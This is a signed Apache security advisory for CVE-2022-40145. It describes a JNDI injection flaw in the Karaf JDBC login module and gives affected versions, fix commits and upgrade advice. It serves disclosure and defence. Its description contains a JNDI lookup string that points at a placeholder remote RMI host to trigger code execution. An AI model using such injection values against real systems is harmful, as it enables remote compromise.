| -----BEGIN PGP SIGNED MESSAGE----- |
| Hash: SHA512 |
| |
| Hash: SHA512 |
| |
| CVE-2022-40145: LDMP injection vulnerability in JDBC Login Module with JDK 8 |
| |
| Severity: Low |
| |
| Vendor: The Apache Software Foundation |
| |
| Versions Affected: all versions of Apache Karaf prior to 4.3.8 or 4.4.2 |
| |
| Description: |
| |
| The method org.apache.karaf.jass.modules.jdbc.JDBCUtils#doCreateDatasource |
| uses InitialContext.lookup(jndiName) without filtering. |
| User can modify `options.put(JDBCUtils.DATASOURCE, "osgi:" + |
| DataSource.class.getName());` to `options.put(JDBCUtils.DATASOURCE, |
| "jndi:rmi://x.x.x.x:xxxx/Command");` in JdbcLoginModuleTest#setup. |
| |
| This vulnerable to a remote code execution (RCE) attack when a |
| configuration uses a JNDI LDAP data source URI when an attacker has |
| control of the target LDAP server. |
| |
| This has been fixed in revision: |
| |
| https://gitbox.apache.org/repos/asf?p=karaf.git;h=3819f48341 |
| https://gitbox.apache.org/repos/asf?p=karaf.git;h=2a933445d1 |
| |
| Mitigation: Apache Karaf users should upgrade to 4.3.8 or 4.4.2 |
| or later as soon as possible, or use correct path. |
| |
| JIRA Tickets: https://issues.apache.org/jira/browse/KARAF-7568 |
| |
| Credit: This issue was discovered and reported by Xun Bai <bbbbear68@gmail.com> |
| -----BEGIN PGP SIGNATURE----- |
| |
| iQIzBAEBCgAdFiEEGqjPktQJpzOT0Lc2v/LuQsgoLnYFAmOW/5wACgkQv/LuQsgo |
| LnaRtBAApAsUA7+zVl03d0pKa7Dd41uec9/voRZ9DSf0byRNdP/NQslAe6ZHEbqz |
| /2pC3OuYj0yfBOWZ6O0uFb/iDt4+GqAz3mnZqRyDq+hcrdBY5VVxkOU+6uRtQ+Sm |
| GfkDmMpJDLOURgG/xQa/G8QhOLiBtBErwB5pffMBoxC12HjBPfichM6KJuT55MGR |
| yvR6CXsPnAlRkyhYPSkI9ehng2BbgnqCHtFQEZwXTViXoyz44/0NZc6URlytsO11 |
| a3/qbkP1p8nvwC5U5D4P/RKRLvN23HZFbFRRms/gNN+L9BKmv8krA3ESnNgi7Kcj |
| 7j+8gRYRzw/g41GuZARC435zCy8PH9ydoHZQnicSmQUpDzBwfCBpRFgiXpq3ztHt |
| 7sLa3rSOVWiJmQiAjQXM1Rr958TrBYRjV2UcTbb0AYEEiZQrAeYHq1M5Y+3pcV9h |
| NsqEeVkDZji0nu1EoTbxcjIJjMo1G8u3k8VvKMAfrQ37gnCfOnKYYak47cwvZzmu |
| suatXXUQffi/YR3wercn/1AyCqYmWPbrcvI2b41eDR5JtDX6OMtRdsshCVwjEh9v |
| k2FSoPCM21+lpbXful4LwIMUppNfwrvn4VXsAsWG4I/g8kxbrFbI0Y/cJHPuCbU2 |
| ABpIBEZGXh8h8TMIimM7EGkKIiF2rlohKsavtgYoi91qrpmca70= |
| =ozdD |
| -----END PGP SIGNATURE----- |